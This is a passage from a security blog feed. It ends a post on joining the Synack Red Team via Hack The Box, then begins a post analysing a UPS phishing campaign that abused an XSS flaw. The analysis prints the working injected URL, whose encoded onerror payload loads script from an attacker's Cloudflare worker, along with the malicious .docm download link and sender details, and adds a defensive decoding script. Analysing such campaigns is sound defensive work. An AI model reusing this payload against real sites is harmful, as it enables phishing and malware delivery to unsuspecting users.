<!--kg-card-end: markdown--><p><strong>Tip</strong>: Do you have a friend who is actively hunting on the platform? Perhaps they could refer you; this may help with your application.</p><hr><h3 id="red-team-researcher-requirements-crowdsourced">RED TEAM RESEARCHER REQUIREMENTS</h3><p>CROWDSOURCED PENETRATION TESTING: RESEARCHER TRUST AND SKILL</p><p>Synack Red Team (SRT) researchers must pass through a rigorous vetting process that includes five intensive vetting stages. SRT applicants must pass through all stages before being fully onboarded; this ensures that researchers are both technically qualified and trustworthy. Synack&#x2019;s vetting process eliminates the majority of applicants, with only ~10% of applicants fully passing through to the final on-boarding stage.</p><h3 id="synack-red-team-vetting-process">Synack Red Team Vetting Process</h3><hr><h3 id="front-end-screening-application-review">FRONT-END SCREENING: APPLICATION REVIEW</h3><p>VETTING STAGES: APPLICATION, RESUME REVIEW AND INTERVIEW</p><p>Following an initial triage of applications, qualified candidates undergo a behavioural interview. Behavioural interviews are performed in person or via video by trained and designated members of Synack&#x2019;s Researcher Onboarding Team (ROT) to assess the candidate&#x2019;s integrity and suitability for membership. During the interview, the ROT will establish a score for the candidate&#x2019;s threshold for ethics, learn about the candidate&#x2019;s motivations and goals, and communicate Synack&#x2019;s stringent requirements and expectations.</p><h3 id="skill-assessment">SKILL ASSESSMENT</h3><p>VETTING STAGE: SKILLS TEST AND ASSESSMENT</p><p>Synack&#x2019;s assurance that only qualified researchers will engage with client assets is enabled by our skill assessment program. Consisting of a written and a practical application component, each skill assessment is specific to a technical domain, such as web or mobile application or host-based testing. 
To ensure fidelity, skill assessments are internally created, maintained and administered. Written and practical components may be taken only once, and must be completed in a single session.</p><h3 id="trust-assessment">TRUST ASSESSMENT</h3><p>VETTING STAGES: BACKGROUND &amp; ID CHECKS, ACCEPTANCE &amp; MONITORING</p><p>Prior to onboarding, all researchers undergo a mandatory trust assessment consisting of background and identity verification and the following mandatory criminal background checks:</p><ul><li>Global terrorism and sanctions list search</li><li>County criminal record history search (7-year)</li><li>Department of Justice sex offender records search<sup>1</sup></li><li>Federal Excluded Parties Listing System search</li><li>Social Security Number trace, including address history cross-referencing<sup>1</sup></li></ul><p>Once the researcher is admitted to the platform, they undergo a 45-day monitored qualifying period before being fully accepted into our program.</p><p><sup>1</sup> DoJ sex offender records search and Social Security Number trace are conducted for domestic candidates only.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/09/image.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="1116" height="467" srcset="https://flaviu.io/content/images/size/w600/2021/09/image.png 600w, https://flaviu.io/content/images/size/w1000/2021/09/image.png 1000w, https://flaviu.io/content/images/2021/09/image.png 1116w" sizes="(min-width: 720px) 720px"><figcaption>Synack Vetting Process Src: Synack</figcaption></figure><h3 id="what-are-the-challenges">What are the challenges?</h3><p>You will typically be given up to 20 challenges that involve the most common modern vulnerabilities being exploited in the wild. 
For confidentiality reasons I cannot go into this subject as much as I&apos;d like to.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image-15.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="900" height="500" srcset="https://flaviu.io/content/images/size/w600/2021/07/image-15.png 600w, https://flaviu.io/content/images/2021/07/image-15.png 900w" sizes="(min-width: 720px) 720px"><figcaption>binary challenge</figcaption></figure><p>Once you complete your preferred route, you&apos;ll e-mail them and they will get back to you.</p><p>Aside from proving your technical ability, all the other stages are just as important. You may have noticed Synack is very careful when picking their members.</p><p>Heads up: you <strong>cannot</strong> collaborate with anyone on this, and you <strong>cannot</strong> ask for hints online. If you plan to cheat, then how will you be able to find vulnerabilities on the platform? After all, this is a job interview, and if you are found in the wrong you will definitely not proceed.</p><h3 id="entry-point-2">Entry Point 2</h3><hr><h3 id="hack-the-box-method-a-and-method-b-">HACK THE BOX - (Method A and Method B)</h3><p><strong><u>Method A: Offshore</u></strong></p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://www.hackthebox.eu/storage/press/synacktrack/offshore.jpg" class="kg-image" alt="Synack Red Team Member" loading="lazy"><figcaption>HackTheBox Offshore Pro Lab Src: HackTheBox</figcaption></figure><h3 id="what-is-offshore">WHAT IS OFFSHORE?</h3><hr><p>Assess, Gain, Pivot. Real-World Active Directory Simulation!</p><p>Offshore Pro Lab is an Active Directory lab that simulates the look and feel of a real-world corporate network. You are an agent tasked with exposing money laundering operations in an offshore international bank. 
As a real-world penetration tester, you need to assess the external perimeter, gain an internal foothold and pivot across multiple hosts and forests. <br>Users start from an external perspective and have to penetrate the &quot;DMZ&quot; and then move laterally through the CORP.LOCAL, DEV, ADMIN and CLIENT forests to complete the lab. To track progress, there are multiple flags planted along the way as well as a few side challenges not required to advance within the Active Directory environment. Players can submit flags to earn a place in the Offshore Hall of Fame and receive badges for various stages of completion.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image-1.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="1397" height="1152" srcset="https://flaviu.io/content/images/size/w600/2021/07/image-1.png 600w, https://flaviu.io/content/images/size/w1000/2021/07/image-1.png 1000w, https://flaviu.io/content/images/2021/07/image-1.png 1397w" sizes="(min-width: 720px) 720px"><figcaption>HackTheBox Offshore Pro Lab Src: HackTheBox</figcaption></figure><h3 id="who-is-offshore-for">Who is Offshore for?</h3><hr><p>Offshore Pro Lab has been designed to appeal to a wide variety of users, everyone from junior-level penetration testers to seasoned cybersecurity professionals as well as InfoSec hobbyists and even blue teamers; there is something for everyone. 
Players will pick up multiple new tricks and hacks, which can be immediately applied to real-world engagements or taken back to their organizations to help improve the overall security posture.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image-4.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="2000" height="558" srcset="https://flaviu.io/content/images/size/w600/2021/07/image-4.png 600w, https://flaviu.io/content/images/size/w1000/2021/07/image-4.png 1000w, https://flaviu.io/content/images/size/w1600/2021/07/image-4.png 1600w, https://flaviu.io/content/images/2021/07/image-4.png 2156w" sizes="(min-width: 720px) 720px"><figcaption>Offshore Penetration Tester HTB Src: HackTheBox</figcaption></figure><p>SKILLS / KNOWLEDGE</p><ul><li>Familiarity with modern tools and techniques used to perform Penetration Testing engagements</li><li>Working knowledge of Networking and Web Application Attacks</li><li>Working knowledge of Linux and Windows Operating Systems and Active Directory</li></ul><p>ATTITUDE / MENTALITY</p><ul><li>Patience and perseverance</li><li>Willingness to do extensive research</li><li>Accept that you might fail more times than you will succeed; it&apos;s part of the process</li></ul><h3 id="what-will-you-gain">What will you gain?</h3><hr><p>Are you ready to develop and enhance your skills in network penetration testing?</p><p>Players will gain the opportunity to attack 17 hosts of various operating system types and versions to obtain 30 flags across a realistic Active Directory lab environment with various standalone challenges hidden throughout. 
Some of the Red Team TTPs (Tactics, Techniques and Procedures) players will learn include:</p><ul><li>Web Application Attacks</li><li>Enumeration</li><li>Exploiting Obscure and Real-World Active Directory Flaws</li><li>Local Privilege Escalation</li><li>Lateral Movement and Crossing Trust Boundaries</li><li>Evading Endpoint Protections</li><li>Reverse Engineering</li><li>Out-Of-The-Box Thinking</li></ul><p>Offshore Lab is not free; players that have completed Offshore will receive a certificate of completion from Hack The Box.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image-5.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="2000" height="775" srcset="https://flaviu.io/content/images/size/w600/2021/07/image-5.png 600w, https://flaviu.io/content/images/size/w1000/2021/07/image-5.png 1000w, https://flaviu.io/content/images/size/w1600/2021/07/image-5.png 1600w, https://flaviu.io/content/images/2021/07/image-5.png 2174w" sizes="(min-width: 720px) 720px"><figcaption>Pricing Offshore Lab Src: HackTheBox</figcaption></figure><p>All Hack The Box players that successfully complete (100%) Offshore Pro Lab [Penetration Tester Level II] get one step closer to joining the Synack Red Team. All you need to do is complete Offshore within this timeframe and send an email to <strong>support@synack.com</strong> with the subject &quot;Offshore Completed&quot; including your official HTB certificate of completion.</p><hr><p><strong><u>Method B: Synack Red Team Track</u></strong></p><p>A great way to fast-track your application to join the SRT through Hack The Box is the <a href="https://app.hackthebox.eu/tracks/8"><strong>Synack Red Team Track</strong></a>!</p><p>Have you discovered our newly announced <strong>Tracks</strong>? 
If not, let&#x2019;s cut straight to the chase and explore <a href="https://app.hackthebox.eu/tracks">Hack The Box Tracks</a> on the new platform.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/image.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="1200" height="675" srcset="https://flaviu.io/content/images/size/w600/2021/08/image.png 600w, https://flaviu.io/content/images/size/w1000/2021/08/image.png 1000w, https://flaviu.io/content/images/2021/08/image.png 1200w" sizes="(min-width: 720px) 720px"><figcaption>Synack Red Team Track Src: HackTheBox</figcaption></figure><p>One of them is the <a href="https://app.hackthebox.eu/tracks/8">Synack Track</a>, including <strong>7 HTB Machines and 7 HTB Challenges</strong>. Create beautiful exploit chains, master some of the most interesting web vulnerabilities, and prove your prowess in the specially curated Synack Red Team Track. </p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/07/image.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="2000" height="791" srcset="https://flaviu.io/content/images/size/w600/2021/07/image.png 600w, https://flaviu.io/content/images/size/w1000/2021/07/image.png 1000w, https://flaviu.io/content/images/size/w1600/2021/07/image.png 1600w, https://flaviu.io/content/images/size/w2400/2021/07/image.png 2400w" sizes="(min-width: 720px) 720px"><figcaption>Synack Track on HackTheBox Src: HackTheBox</figcaption></figure><p>Due to some machines being retired that are part of the track, you will need a VIP subscription to be able to spawn these boxes.</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/07/htb-cost.PNG" width="1584" height="1034" loading="lazy" alt="Synack Red 
Team Member" srcset="https://flaviu.io/content/images/size/w600/2021/07/htb-cost.PNG 600w, https://flaviu.io/content/images/size/w1000/2021/07/htb-cost.PNG 1000w, https://flaviu.io/content/images/2021/07/htb-cost.PNG 1584w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/07/htb-cost-yearly.PNG" width="1582" height="1048" loading="lazy" alt="Synack Red Team Member" srcset="https://flaviu.io/content/images/size/w600/2021/07/htb-cost-yearly.PNG 600w, https://flaviu.io/content/images/size/w1000/2021/07/htb-cost-yearly.PNG 1000w, https://flaviu.io/content/images/2021/07/htb-cost-yearly.PNG 1582w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Hack The Box Subscription Cost Src: HackTheBox</figcaption></figure><p>As Ryan Rutan, Director of Community at Synack, said &quot;We are very excited about this joint effort with Hack The Box as it will help many up and coming security professionals test their talents as a potential member of the Synack Red Team.</p><p>As a valued Hack The Box user, you have had the opportunity to test and improve your cyber security skills using the HTB training platform. Given your track record, we feel you have demonstrated the skills needed on the Synack Red Team to provide crowdsourced security testing.</p><p>Synack responsibly grows the SRT proportional to the opportunities that are available to the community. This ensures both an equitable, yet competitive, landscape that strives above all else to be fair and respectful to each SRT such that they can hack, learn and grow as security professionals. Synack leverages an application waitlist to ensure that growth is always strategically aligned in this regard.&quot;</p><h3 id="conclusion">Conclusion</h3><hr><p>I have been super excited to explore the platform, complete a few missions, find a few bugs, learn along the way and level UP! 
</p><p>So far I am just beginning to get used to how things are done, but see a screenshot of my current stats below.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/09/image-1.png" class="kg-image" alt="Synack Red Team Member" loading="lazy" width="1473" height="697" srcset="https://flaviu.io/content/images/size/w600/2021/09/image-1.png 600w, https://flaviu.io/content/images/size/w1000/2021/09/image-1.png 1000w, https://flaviu.io/content/images/2021/09/image-1.png 1473w" sizes="(min-width: 720px) 720px"><figcaption>Stats. Src: Synack</figcaption></figure><p>If you decide this is for you, I wish you all the best on your journey! Don&apos;t get demotivated if somebody says you can&apos;t do it. Instead, accept it as a challenge, give your best, work hard and prove your worth.</p><!--kg-card-begin: markdown--><p>Sources:<br>
<a href="https://cdnm.synack.com/wp-content/uploads/2020/07/SRT-VettingRequirements-2019.pdf">Synack Requirements </a><br>
<a href="https://www.hackthebox.eu/newsroom/synack-red-team-track">HackTheBox Tracks</a></p>
<!--kg-card-end: markdown--><!--kg-card-begin: markdown--><p>Have you got any suggestions or questions for me? <a href="mailto:hello@flaviu.io">Get in touch!</a></p>
<p>Thank you for reading my article. Until next time!</p>
<p>Your friendly neighbourhood <mark>Hacker.</mark></p>
<!--kg-card-end: markdown-->]]></content:encoded></item><item><title><![CDATA[The "Almost" Perfect Phishing C@mpaign]]></title><description><![CDATA[Let's talk about one of the most creative phishing campaigns. In attacker jargon, this sequenced fence hopping is known as building a full exploit chain. ]]></description><link>https://flaviu.io/the-almost-perfect-phishing-campaign/</link><guid isPermaLink="false">6124fffae056bf37bb0e729a</guid><category><![CDATA[crypto]]></category><category><![CDATA[hacking]]></category><category><![CDATA[offensivesecurity]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Flaviu Popescu]]></dc:creator><pubDate>Tue, 24 Aug 2021 18:56:00 GMT</pubDate><media:content url="https://flaviu.io/content/images/2021/08/maldoc.jpg" medium="image"/><content:encoded><![CDATA[<hr><img src="https://flaviu.io/content/images/2021/08/maldoc.jpg" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign"><p>Let&apos;s talk about one of the most creative phishing campaigns I have ever seen to date. In attacker jargon, this sequenced fence hopping is known as building a full exploit chain: Combining multiple vulnerabilities into a chain of attack that ends with the attacker in a privileged position on the targeted system.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/malware_pic.jpg" class="kg-image" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" loading="lazy" width="1200" height="800" srcset="https://flaviu.io/content/images/size/w600/2021/08/malware_pic.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/08/malware_pic.jpg 1000w, https://flaviu.io/content/images/2021/08/malware_pic.jpg 1200w" sizes="(min-width: 720px) 720px"><figcaption>Malware</figcaption></figure><p><br>Since Covid19 began, the deliveries have surged drastically. Either for grocery shopping or something you have ordered, we all receive many parcels from various couriers. 
It is more common than before to receive text or e-mail notifications regarding status updates for your delivery. This raises the chances of being phished considerably, especially if you are already waiting on a delivery.</p><p>This phishing campaign is the most realistic because it leveraged a Cross-Site Scripting (XSS) vulnerability that existed in one of the courier&apos;s websites (UPS). The vulnerability enabled the attackers to modify the page contents, turning a genuine UPS page into a download page by injecting malicious HTML and JavaScript code.</p><p>This vulnerability allowed the attacker to distribute a weaponised document (docm) from a remote <a href="https://workers.cloudflare.com/">CloudFlare worker</a> while making it appear as though it was being downloaded directly from UPS.com.</p><p>When the document is downloaded and macros are enabled, the macros attempt to retrieve the next payload, hosted on a second domain controlled by the threat actor. At this stage it is uncertain what the final payload is supposed to do. The sky is the limit - Ransomware? Spyware? Botnet? 
We&apos;ll see.</p><p>The phishing campaign was first discovered on Aug 23, 2021, by security researcher Daniel Gallagher.</p><h2 id="dissecting-the-ups-phishing-scam"><strong>Dissecting the UPS phishing scam</strong></h2><hr><p>Screenshots of the e-mail:</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/08/phishing-email.jpg" width="1294" height="1115" loading="lazy" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" srcset="https://flaviu.io/content/images/size/w600/2021/08/phishing-email.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/08/phishing-email.jpg 1000w, https://flaviu.io/content/images/2021/08/phishing-email.jpg 1294w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/08/E9es0bwWYAcnLLW-1.jpg" width="2000" height="1813" loading="lazy" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" srcset="https://flaviu.io/content/images/size/w600/2021/08/E9es0bwWYAcnLLW-1.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/08/E9es0bwWYAcnLLW-1.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/08/E9es0bwWYAcnLLW-1.jpg 1600w, https://flaviu.io/content/images/size/w2400/2021/08/E9es0bwWYAcnLLW-1.jpg 2400w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption>Phishing Email UPS</figcaption></figure><p>This is a decent attempt, a 1:1 copy of the template! No spelling mistakes or weird hidden &quot;Click here&quot; URLs. Going back to my title, let me explain why I said &quot;Almost&quot;. The sender addresses were not very convincing, although they were good enough to pass SPF and DKIM checks; moreover, because the link abused XSS on the real UPS site, it did not break TLS validation either. Daniel&apos;s screenshots show unitedparacelservice@paradanta.com; however, I found another attempt coming from unitedparcelservice@tvamberg.de. 
The local part of the sender address is always &quot;unitedparcelservice&quot; while the domains vary. Since both domains run WordPress as their content management system, it is safe to assume they were compromised, perhaps through weak passwords or out-of-date builds/plugins, and that this allowed the attacker to send bulk e-mail from their servers.<br>The tracking-number link is the vulnerable XSS URL on the UPS.com website. It downloads a malicious document pretending to be an invoice.<br>Let&apos;s have a look at the URL in question.</p><p>The email headers:</p><p>Sending address: unitedparcelservice @ paradanta[.]com<br>SMTP server: 212.227.126[.]134 / mout.kundenserver[.]de</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/E9f7XDAXIAICH8.jpg" class="kg-image" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" loading="lazy" width="2000" height="417" srcset="https://flaviu.io/content/images/size/w600/2021/08/E9f7XDAXIAICH8.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/08/E9f7XDAXIAICH8.jpg 1000w, https://flaviu.io/content/images/size/w1600/2021/08/E9f7XDAXIAICH8.jpg 1600w, https://flaviu.io/content/images/2021/08/E9f7XDAXIAICH8.jpg 2276w" sizes="(min-width: 720px) 720px"><figcaption>Email Headers unitedparcelservice@paradanta.com</figcaption></figure><hr><!--kg-card-begin: markdown--><p>Url Encoded:<br>
<code>https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178&amp;service=standard_delivery&amp;xref=MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==&amp;loc=en_US%22%3E%3Cimg%20src%3D%22x%22%20onerror%3D%22Function%28atob%28%27JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ%3D%3D%27%29%29%28%29</code></p>
<p>Url Decoded:<br>
<code>https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178&amp;service=standard_delivery&amp;xref=MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ==&amp;loc=en_US&quot;&gt;&lt;img src=&quot;x&quot; onerror=&quot;Function(atob(&apos;JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ==&apos;))()</code></p>
<p>Tidying up more:<br>
<code>https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178&amp;service=standard_delivery&amp;xref=useless&amp;loc=en_US&quot;&gt;&lt;img src=&quot;x&quot; onerror=&quot;Function(atob(&apos;$.getScript(&apos;https://m.media-amazon.workers.dev/js&apos;)&apos;))()</code></p>
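<p>The three decoding steps above (percent-decode, spot the break-out after loc, base64-decode the atob() argument), automated as a defender-side triage helper. This is an added example, not code from the original post: the URL is the one quoted above, while the function names and report fields are my own.</p>

```python
"""Triage a link for attribute break-out XSS and the payloads hidden inside it."""
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# The link from the phishing e-mail as quoted above, URL-encoded as sent.
PHISHING_URL = (
    "https://www.ups.com/dropoff/invoice?id=1Z7301XR1412220178"
    "&service=standard_delivery"
    "&xref=MSBqVTU3IE4zM2QgNzAgbTRLMyA3aDE1IFVSTCA0IGwxNzdsMyBMMG45M3IgNzAgSDFEMyBuM3g3"
    "IHFVM3JZIFA0UjRNLCB5MHUgNExSMzREeSBLbjB3IFdoWSA7KQ=="
    "&loc=en_US%22%3E%3Cimg%20src%3D%22x%22%20onerror%3D%22Function%28atob%28%27"
    "JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ%3D%3D"
    "%27%29%29%28%29"
)

# A value that closes the attribute and element it was reflected into and
# opens a new tag, e.g.  en_US"><img ...
BREAKOUT_RE = re.compile(r"""["']\s*>\s*<\s*([A-Za-z][A-Za-z0-9]*)""")
# Inline event handler attributes (onerror=, onload=, ...).
HANDLER_RE = re.compile(r"\b(on[a-z]+)\s*=", re.IGNORECASE)
# The base64 literal handed to atob(...).
ATOB_RE = re.compile(r"""atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")
# Long base64 runs used as whole query parameter values (the xref padding).
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")


def split_query(url):
    """Return the query as an ordered list of (name, percent-decoded value).

    Splitting on '&' and '=' happens *before* percent-decoding, so encoded
    '%26' or '%3D' inside an injected value cannot fragment it into pieces.
    """
    pairs = []
    for part in urlsplit(url).query.split("&"):
        if part:
            name, _, raw = part.partition("=")
            pairs.append((unquote(name), unquote(raw)))
    return pairs


def decode_base64_text(blob):
    """Strictly decode base64 to text, or return None if it is not valid text."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def triage_url(url):
    """Flag an attribute break-out and unpack the encoded payloads behind it."""
    report = {
        "breakout_param": None,   # parameter whose value escapes its attribute
        "breakout_offset": None,  # index in the decoded URL where it happens
        "injected_tag": None,
        "event_handlers": [],
        "atob_payloads": [],      # decoded atob('...') arguments
        "remote_scripts": [],     # URLs found inside those payloads
        "decoded_base64_params": {},
    }
    decoded_url = unquote(url)
    for name, value in split_query(url):
        hit = BREAKOUT_RE.search(value)
        if hit and report["breakout_param"] is None:
            injected = value[hit.start():]
            report["breakout_param"] = name
            # A large offset means the injection sits far past what an
            # address bar displays, which is exactly what the xref padding buys.
            report["breakout_offset"] = decoded_url.find(injected)
            report["injected_tag"] = hit.group(1).lower()
            report["event_handlers"] = [h.lower() for h in HANDLER_RE.findall(injected)]
            for blob in ATOB_RE.findall(injected):
                text = decode_base64_text(blob)
                if text is not None:
                    report["atob_payloads"].append(text)
                    report["remote_scripts"].extend(URL_RE.findall(text))
        elif BASE64_RE.match(value):
            # Long base64 parameter values are worth decoding; here the xref
            # value carries the attacker's own note about the trick.
            text = decode_base64_text(value)
            if text is not None and text.isprintable():
                report["decoded_base64_params"][name] = text
    return report


if __name__ == "__main__":
    for key, val in triage_url(PHISHING_URL).items():
        print(f"{key}: {val}")
```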
<!--kg-card-end: markdown--><p>The xref parameter holds another base64-encoded string, which decodes to: 1 jU57 N33d 70 m4K3 7h15 URL 4 l177l3 L0n93r 70 H1D3 n3x7 qU3rY P4R4M, y0u 4LR34Dy Kn0w WhY ;).</p><p>Super interesting: the threat actor was kind enough to leave a comment in the base64 string explaining its purpose, which is to hide the query parameter appended at the end of the URL. Because the URL is so long, browsers will not show all of it in the address bar, and since the malicious XSS injection sits at the very end we can&apos;t see it.</p><p>The XSS payload is executed right after the loc parameter and is: &lt;img src=&quot;x&quot; onerror=&quot;Function(atob(&apos;JC5nZXRTY3JpcHQoJ2h0dHBzOi8vbS5tZWRpYS1hbWF6b24ud29ya2Vycy5kZXYvanMnKQ==&apos;))()</p><p>And yet another base64 string, this one decoding to $.getScript(&apos;<a href="https://m.media-amazon.workers.dev/js">https://m.media-amazon.workers.dev/js</a>&apos;); this is the worker script that gets loaded into the UPS page. $.getScript is jQuery&apos;s script loader, so the payload relies on jQuery already being present on the UPS page. The &lt;img src&gt; XSS payload is quite common, so nothing fancy there; the atob() function decodes a string that has been encoded using Base64. 
This function is commonly used in payloads that steal cookies, to bypass blocklists, and in blind XSS injections.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/cloudflare-worker-script-1.jpg" class="kg-image" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" loading="lazy" width="1270" height="373" srcset="https://flaviu.io/content/images/size/w600/2021/08/cloudflare-worker-script-1.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/08/cloudflare-worker-script-1.jpg 1000w, https://flaviu.io/content/images/2021/08/cloudflare-worker-script-1.jpg 1270w" sizes="(min-width: 720px) 720px"><figcaption>CloudFlare Worker Script</figcaption></figure><p>The above script modifies the UPS page to display a message that a file is about to be downloaded.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/xss-ups-download-page-1.jpg" class="kg-image" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" loading="lazy" width="1600" height="1204" srcset="https://flaviu.io/content/images/size/w600/2021/08/xss-ups-download-page-1.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/08/xss-ups-download-page-1.jpg 1000w, https://flaviu.io/content/images/2021/08/xss-ups-download-page-1.jpg 1600w" sizes="(min-width: 720px) 720px"><figcaption>UPS XSS Downloading</figcaption></figure><p>This approach is truly what makes this campaign stand out. 
Victims of this campaign might be tricked into opening the invoice with less suspicion, thinking it is a genuine file from UPS.</p><h2 id="the-mysterious-fake-invoice-document"><strong>The mysterious fake &apos;Invoice&apos; document</strong></h2><hr><p>In the worker script above there is another URL, in the parameter named downloadUrl; this was available at <a href="https://m.media-amazon.workers">https://m.media-amazon.workers</a>[.]dev/documents/invoice_1Z7301XR1412220178</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/malicious-invoice-document.jpg" class="kg-image" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" loading="lazy" width="1381" height="1030" srcset="https://flaviu.io/content/images/size/w600/2021/08/malicious-invoice-document.jpg 600w, https://flaviu.io/content/images/size/w1000/2021/08/malicious-invoice-document.jpg 1000w, https://flaviu.io/content/images/2021/08/malicious-invoice-document.jpg 1381w" sizes="(min-width: 720px) 720px"><figcaption>Malicious Phishing Document</figcaption></figure><p>The downloaded document is named &apos;invoice_1Z7301XR1412220178.docm&apos; and claims to be a shipping invoice from UPS. Note the extension: &apos;.docm&apos;. The macro names were &quot;Hehehe&quot; and &quot;hahahah&quot;.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://flaviu.io/content/images/2021/08/macros.jpg" class="kg-image" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" loading="lazy" width="610" height="477" srcset="https://flaviu.io/content/images/size/w600/2021/08/macros.jpg 600w, https://flaviu.io/content/images/2021/08/macros.jpg 610w"><figcaption>Phishing Document Macros</figcaption></figure><p>DOCM files are documents generated by Microsoft Word 2007 or higher with the ability to run macros. The format is similar to DOCX, but the ability to run macros is what sets it apart. 
Like DOCX, DOCM files can store text, images, tables, shapes, charts and other content. The capability to run macros makes it easy to save time by executing a series of commands, in the form of recorded actions, to complete a task automatically. DOCM files can be opened and edited in Microsoft Word 2007 and above.</p><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/08/Screenshot-2021-08-23-at-09.59.07.png" width="1782" height="954" loading="lazy" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" srcset="https://flaviu.io/content/images/size/w600/2021/08/Screenshot-2021-08-23-at-09.59.07.png 600w, https://flaviu.io/content/images/size/w1000/2021/08/Screenshot-2021-08-23-at-09.59.07.png 1000w, https://flaviu.io/content/images/size/w1600/2021/08/Screenshot-2021-08-23-at-09.59.07.png 1600w, https://flaviu.io/content/images/2021/08/Screenshot-2021-08-23-at-09.59.07.png 1782w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/08/Screenshot-2021-08-23-at-09.59.21.png" width="1143" height="1239" loading="lazy" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" srcset="https://flaviu.io/content/images/size/w600/2021/08/Screenshot-2021-08-23-at-09.59.21.png 600w, https://flaviu.io/content/images/size/w1000/2021/08/Screenshot-2021-08-23-at-09.59.21.png 1000w, https://flaviu.io/content/images/2021/08/Screenshot-2021-08-23-at-09.59.21.png 1143w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://flaviu.io/content/images/2021/08/Screenshot-2021-08-23-at-09.58.47.png" width="787" height="403" loading="lazy" alt="The &quot;Almost&quot; Perfect Phishing C@mpaign" srcset="https://flaviu.io/content/images/size/w600/2021/08/Screenshot-2021-08-23-at-09.58.47.png 600w, 
